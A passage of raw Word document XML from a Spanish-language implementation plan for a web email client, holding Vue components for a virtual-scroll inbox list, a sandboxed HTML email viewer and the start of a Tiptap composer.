          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> logout }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="188"/>
    <w:bookmarkStart w:id="189" w:name="lista-de-emails-virtual-scroll"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3.4 Lista de Emails: Virtual Scroll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- packages/web/src/components/VirtualEmailList.vue --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;template&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;div ref="container" class="flex-1 overflow-y-auto" @scroll="onScroll"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div :style="{ height: `${totalHeight}px`, position: 'relative' }"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;div</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        v-for="email in visibleEmails"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :key="email.id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :style="{ transform: `translateY(${email.offsetY}px)`, position: 'absolute', top: 0, left: 0, right: 0 }"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @click="$emit('select-one', email.id)"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :class="[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          'px-4 py-3 border-b border-gray-100 dark:border-gray-800 cursor-pointer transition-colors',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          selected.has(email.id) ? 'bg-blue-50 dark:bg-blue-900/20' : 'hover:bg-gray-50 dark:hover:bg-gray-800',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          !email.isRead &amp;&amp; 'font-semibold'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ]"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;div class="flex items-center gap-2"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;input</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            type="checkbox"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            :checked="selected.has(email.id)"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            @click.stop="$emit('select', email.id)"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            class="rounded"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;button @click.stop="$emit('toggle-star', email.id)" class="text-lg"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            {{ email.isStarred ? '★' : '☆' }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;span class="flex-1 truncate text-sm dark:text-gray-200"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            {{ email.from[0]?.name || email.from[0]?.address }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;/span&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;span class="text-xs text-gray-400"&gt;{{ formatDate(email.date) }}&lt;/span&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;div class="text-sm truncate dark:text-gray-300 mt-0.5 pl-7"&gt;{{ email.subject }}&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;div class="text-xs text-gray-400 truncate pl-7"&gt;{{ email.preview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ref, computed, onMounted } from 'vue';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import { formatDistanceToNow } from 'date-fns';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import { es } from 'date-fns/locale';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const props = defineProps&lt;{ emails: Email[]; selected: Set&lt;string&gt;; total: number }&gt;();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const emit = defineEmits(['select', 'select-one', 'scroll-end', 'toggle-read', 'toggle-star']);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const ITEM_HEIGHT = 80;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const OVERSCAN = 5;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const container = ref&lt;HTMLDivElement&gt;();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const scrollTop = ref(0);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const containerHeight = ref(800);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const totalHeight = computed(() =&gt; props.total * ITEM_HEIGHT);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const visibleRange = computed(() =&gt; {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  const start = Math.floor(scrollTop.value / ITEM_HEIGHT);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  const count = Math.ceil(containerHeight.value / ITEM_HEIGHT);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  return {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    start: Math.max(0, start - OVERSCAN),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    end: Math.min(props.total, start + count + OVERSCAN),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const visibleEmails = computed(() =&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  props.emails.slice(visibleRange.value.start, visibleRange.value.end).map((email, i) =&gt; ({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...email,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    offsetY: (visibleRange.value.start + i) * ITEM_HEIGHT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  }))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">function onScroll() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (!container.value) return;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  scrollTop.value = container.value.scrollTop;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  const bottom = scrollTop.value + containerHeight.value;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (bottom &gt;= totalHeight.value - ITEM_HEIGHT * 3) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    emit('scroll-end');</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">function formatDate(d: string) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  return formatDistanceToNow(new Date(d), { addSuffix: true, locale: es });</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onMounted(() =&gt; {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (container.value) containerHeight.value = container.value.clientHeight;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="189"/>
    <w:bookmarkStart w:id="190" w:name="vista-de-lectura-html-sanitizado"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.3.5 Vista de Lectura: HTML Sanitizado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- packages/web/src/components/EmailViewer.vue --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;template&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;div class="p-6"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;h1 class="text-xl font-semibold mb-2 dark:text-white"&gt;{{ email.subject }}&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="flex items-center gap-3 mb-4 pb-4 border-b dark:border-gray-700"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;Avatar :email="email.from[0]?.address" :name="email.from[0]?.name" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;div class="flex-1"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;div class="font-medium dark:text-gray-200"&gt;{{ email.from[0]?.name || email.from[0]?.address }}&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;div class="text-sm text-gray-500"&gt;{{ formatDateFull(email.date) }}&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- Tabs: HTML / Texto Plano / Headers --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="flex gap-4 mb-4 border-b dark:border-gray-700"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;button</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        v-for="tab in ['html', 'text', 'headers']"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :key="tab"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        @click="activeTab = tab"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        :class="['pb-2 text-sm capitalize', activeTab === tab ? 'border-b-2 border-blue-600 text-blue-600' : 'text-gray-500']"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        {{ tab === 'html' ? 'HTML' : tab === 'text' ? 'Texto' : 'Cabeceras' }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!-- Contenido en iframe aislado para HTML --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;iframe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      v-if="activeTab === 'html' &amp;&amp; email.bodyHtmlSanitized"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      :srcdoc="email.bodyHtmlSanitized"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      class="w-full border-0"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      style="min-height: 400px;"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      sandbox="allow-same-origin"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      referrerpolicy="no-referrer"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;pre v-else-if="activeTab === 'text'" class="whitespace-pre-wrap dark:text-gray-300"&gt;{{ email.bodyText }}&lt;/pre&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;pre v-else class="text-xs dark:text-gray-400 overflow-x-auto"&gt;{{ JSON.stringify(email.headers, null, 2) }}&lt;/pre&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="190"/>
    <w:bookmarkEnd w:id="191"/>
    <w:bookmarkStart w:id="194" w:name="fase-4-compose-y-drafts-semana-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.4 Fase 4: Compose y Drafts (Semana 4)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="192" w:name="tiptap-2-con-toolbar"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.4.1 Tiptap 2 con Toolbar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- packages/web/src/components/Composer.vue --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;template&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;div class="flex flex-col h-full bg-white dark:bg-gray-900"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="flex items-center gap-2 p-3 border-b dark:border-gray-700"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        v-model="compose.to"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        placeholder="Para"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
